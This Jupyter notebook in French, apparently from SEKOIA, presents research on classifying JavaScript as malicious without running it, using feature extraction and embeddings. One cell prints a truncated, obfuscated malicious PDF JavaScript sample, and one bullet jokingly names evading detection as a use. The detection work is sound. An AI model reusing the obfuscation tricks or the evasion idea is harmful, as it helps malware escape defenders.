In [7]:

    
%matplotlib inline
import jsitbad
data = jsitbad.load_js_files('Javascript/*/*')

Classification de fragments JavaScript comme malveillant ou non, sans les exécuter

Edouard Klein, Sébastien Larinier, Alexandra Toussaint @ SEKOIA

Intérêt

Attirer l'attention de l'analyste sur des fichiers suspects issus d'une collecte
Filtrer les fichiers passant par un proxy
S'assurer que son propre code malveillant à l'air sympa (il ne faut donc pas partager cet outil avec tout le monde)

Challenges

Théoriquement impossible (Se réduit au halting problem, donc incalculable)
Surtout si on ne peut pas exécuter le code (rappelons nous qu'il est peut-être malveillant)...
Mais en regardant la source on a quand même une petite idée.
La minification nous rend la vie difficile

Donc c'est que ce doit être faisable en pratique.

Et ça a déjà été tenté :

Peter Likarish, Eunjin Jung, and Insoon Jo. Obfuscated malicious javascript detection using clas- sification techniques. In 4th International Conference on Malicious and Unwanted Software (MALWARE), 2009, pages 47–54. IEEE.

Qui est plus un détecteur de code illisible qu'un détecteur de code malveillant.



In [8]:

    
from pygments import highlight
from pygments.lexers import JavascriptLexer
from pygments.formatters import HtmlFormatter
import re
from IPython.core.display import HTML
def pygment_code(code):
    snippet = highlight(code, JavascriptLexer(),HtmlFormatter(full=True))
    snippet_sub = re.sub(r"""(body \.|class=")""",r"""\1pygm""",snippet)
    return HTML(snippet_sub)

def show_file(fname, start, end):
    js = [x['code'] for x in data if x['name'] == fname][0][start:end]
    return pygment_code(js)



In [10]:

    
show_file('MooTools-Core-1.5.1.js', 1099, 1900)









    Out[10]:









  
  
  




this.MooTools = {
	version: '1.5.1',
	build: '0542c135fdeb7feed7d9917e01447a408f22c876'
};

// typeOf, instanceOf

var typeOf = this.typeOf = function(item){
	if (item == null) return 'null';
	if (item.$family != null) return item.$family();

	if (item.nodeName){
		if (item.nodeType == 1) return 'element';
		if (item.nodeType == 3) return (/\S/).test(item.nodeValue) ? 'textnode' : 'whitespace';
	} else if (typeof item.length == 'number'){
		if ('callee' in item) return 'arguments';
		if ('item' in item) return 'collection';
	}

	return typeof item;
};

var instanceOf = this.instanceOf = function(item, object){
	if (item == null) return false;
	var constructor = item.$constructor || item.constructor;
	while (constructor){
		if (constructor === object) return true;
		constructor = constructor



In [11]:

    
show_file('webix.js', 190, 1000)









    Out[11]:









  
  
  




window.webix||(webix={}),webix.version="2.2.3",webix.codebase="./",webix.name="core",webix.clone=function(t){var e=webix.clone.a;return e.prototype=t,new e},webix.clone.a=function(){},webix.extend=function(t,e,i){if(t.b)return webix.PowerArray.insertAt.call(t.b,e,1),t;for(var s in e)(!t[s]||i)&&(t[s]=e[s]);
return e.defaults&&webix.extend(t.defaults,e.defaults),e.$init&&e.$init.call(t),t},webix.copy=function(t){var e;arguments.length>1?(e=arguments[0],t=arguments[1]):e=webix.isArray(t)?[]:{};for(var i in t)t[i]&&"object"==typeof t[i]&&!webix.isDate(t[i])?(e[i]=webix.isArray(t[i])?[]:{},webix.copy(e[i],t[i])):e[i]=t[i];
return e},webix.single=function(t){var e=null,i=function(){return e||(e=new t({})),e.c&&e.c.apply(e,arguments),e};return i},webix.protoUI=function(){var t=arguments,e=t[0].name,i=func



In [12]:

    
show_file('2cee1e15cde38907aa427da3e2161c4894d62e084b5adac92dcd9636bf8580e8.out', 0, 500)









    Out[12]:









  
  
  




c = []; zzzpages.push(c); this.numPages = zzzpages.length;

//jsunpack End PDF headers
ImageField1=this;
var rawValue = "";

yy=0;
s=null;
try{ImageField1.getDisplayItem({asd:31})}catch(q){if(ImageField1.isPropertySpecified('w')){yy=false?123:2}}
xt="trin\u0067";
x='\u0065\u0049';
xr="\x65";
dd="\u0043\u006f\u0064\u0065";
dde="\u006d\u0043\u0068\u0061\u0072";
s="\u006e\u0074\u0076";
xx=s[2]+"";
xx=xx+"\x61\x6c";
if(yy){function XA(z,a,b){return ZA(a,b)};}
if(yy)XA(0,1,2);
p=z[xr+xx]("S".concat(x



In [13]:

    
X = jsitbad.simple_features([x['code'] for x in data])
X.shape









    Out[13]:





(61, 7)



In [15]:

    
jsitbad.project_on_plane(X, [x['color'] for x in data])



In [17]:

    
jsitbad.project_on_plane(X, [x['color'] for x in data], unique='Spectral Embedding', 
                         labels=[x['name'] if x['color']=='g' else '' for x in data])



In [25]:

    
data = jsitbad.load_js_files('hard_js/*')
f = jsitbad.train_from_js_tokens([x['code'] for x in data])
X_tokens = f([x['code'] for x in data])
X_tokens = X_tokens.toarray()
X_tokens.shape









    Out[25]:





(54, 76)



In [26]:

    
jsitbad.project_on_plane(X_tokens, [x['color'] for x in data])



In [27]:

    
jsitbad.project_on_plane(X_tokens, [x['color'] for x in data], unique='LLE', 
                         labels=[x['name'] if x['color']=='g' else '' for x in data])